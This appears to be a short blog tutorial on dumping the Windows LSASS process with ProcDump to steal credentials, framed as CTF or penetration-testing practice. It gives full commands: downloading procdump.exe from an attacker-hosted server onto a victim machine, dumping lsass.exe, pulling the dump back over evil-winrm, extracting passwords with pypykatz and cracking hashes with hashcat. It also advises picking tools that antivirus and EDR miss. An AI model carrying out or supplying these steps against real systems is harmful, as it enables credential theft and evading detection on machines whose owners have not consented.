How to dump LSASS with ProcDump
This article is for educational purposes only! I do not encourage you to run this to a machine you do not have permission to run. Performing these actions without permission can lead to prosecution by the courts. I am not responsible for your actions!
In this short article, I will guide you to the steps you can perform to dump the LSASS process on a machine running Microsoft Windows. Without further redue, let’s get jump into it.
Overview
If you are working on a CTF or you are assigned to perform a pentest on a machine, you can come in the situation that you have to dump the LSASS process. You can use the well-known tool Mimikatz for this purpose. Mimikatz has only one big problem, it’s recognized by 57 / 70 antivirus products on VirusTotal, so using Mimikatz is not a wise choice for most environments. You have a high chance that you’re being noticed by the antivirus and so you will reveal to the blue teamers that you are in the network.
To avoid detection, you can use a LOLBAS (Living On the Land Binary Or Script) approach, by using ProcDump, instead of Mimikatz. ProcDump is recognized by 1 / 68 antivirus products on VirusTotal.
Even when you are using ProcDump you have to watch out. Some companies have deployed an EDR (Endpoint Detection and Response) solution on their systems. Most EDR solutions will generate a Medium alert when ProcDump is being used to dump a process, especially when the LSASS process is involved.
ProcDump
ProcDump is part of the Windows SysInternals, the main purpose of this command-line utility is to troubleshoot CPU spikes and generating crash dumps during a spike, so that an administrator or developer can determine the cause of the spike. But, it can also generate a dump of a process. And, especially the last functionality is useful in our scenario.
Dumping LSASS
In this example, I have broken into a system and I want to dump the LSASS. I have already a shell on the machine through Windows Remote Management (WinRM) with evil-winrm.
On the victim machine, we have downloaded procdump.exe
to the C:\temp
directory. I have hosted a HTTP server on my attacker machine, to download the binary.
1
curl 10.10.14.13/procdump.exe -o procdump.exe
Now, we can dump the lsass.exe
proces.
1
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
Ok, we have now the lsass.dmp
file which contains juicy information. We need to transfer this file to our attacker machine to analyze the contents.
1
download lsass.dmp
Extracting lsass.dmp
To analyze the contents we are using Pypykatz. Pypykatz is the Python implementation of Mimikatz. If you not have pypykatz installed, you can install it by running this command below.
1
git clone https://github.com/skelsec/pypykatz.git
Now run Pypykatz and call the lsass.dmp
file.
1
pypykatz lsa minidump lsass.dmp
You have now extracted the lsass.dmp
file which can contains plain text passwords. You can try to decrypt the LM hash and NT hash with hashcat.
Happy hacking! 🙂